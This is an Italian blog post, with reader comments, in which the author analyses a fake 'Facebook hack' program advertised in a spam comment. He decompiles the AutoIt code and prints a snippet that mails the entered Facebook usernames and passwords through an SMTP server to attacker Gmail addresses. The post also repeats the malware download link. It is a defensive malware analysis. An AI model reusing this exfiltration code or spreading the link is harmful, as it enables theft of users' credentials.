Ieri mi sono trovato questo messaggio su un post del blog:
Autore: luca (IP: xxx)
E-mail: xxx
Commento:
Provate questo funziona ancoraaaaaaaaaaa!!! xD sfrutta un bug nel
db di fB 😉 http://FacebookOwner.fileave.com/Facebook Owner.rar
Incuriosito, ho subito provato il programma in un ambiente protetto, come ormai ho imparato a fare in questo genere situazioni. All’apertura mi chiedeva dati di login di Facebook. L’interfaccia scarna puzzava di scam in ogni suo più piccolo dettaglio:
A questo punto ho creato un account Facebook fasullo e ho provato ad inserirlo: errore login ogni volta che provavo a premere invio.
Dopo qualche ora di disassembling (sto diventando lento, ma dopotutto era tanto che non facevo nulla) sono arrivato a decompilare il codice, AutoIT.
Risparmiandovi grossa parte del codice, vi estraggo una parte interessante:
$SMTPSERVER = "mail.libero.it"
$FROMNAME = @ComputerName
$FROMADDRESS = "ugofb@gmail.com"
$TOADDRESS = "ugopoli2@gmail.com"
$RC = _INETSMTPMAILCOM($SMTPSERVER, $FROMNAME, $FROMADDRESS, $TOADDRESS, $SUBJECT, $BODY, $ATTACHFILES, $IMPORTANCE, $USERNAME, $PASSWORD, $IPPORT, $SSL)
dove $BODY contiene anche tutte gli user e pass provati.
Non mi sono fermato! A presto con la seconda parte =)
e la seconda parte?? non l’hai postata più?
Ciao, no purtroppo non sono riuscito. In realtà cercavo di risalire
all’identità della persona, e avevo trovato una pagina web con la
sua foto. Ma non potevo essere sicuro che in realtà , semplicemente,
non gli avessero rubato i dati di accesso alla casella
email..Quindi ho desistito.
Che odio le email di scam… Soprattutto quelle che arrivano da un
presunto e falsissimo poste.it sull’indirizzo email delle poste!
Assurdo! Non dovrebbero riuscire a bloccare almeno questo tipo di
email che sanno di non aver mandato loro stessi?